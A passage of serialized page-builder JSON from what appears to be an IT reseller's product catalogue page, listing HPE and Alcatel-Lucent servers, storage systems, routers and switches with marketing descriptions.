deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf4a7d2\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"34c9825\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c6c2e78\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"611dff3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"bbf6243\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"65d7d46\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f5ccf11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d891af\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ea549c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"136e88a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ecc5e6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e56afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75d320e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a0f3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"20063ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and 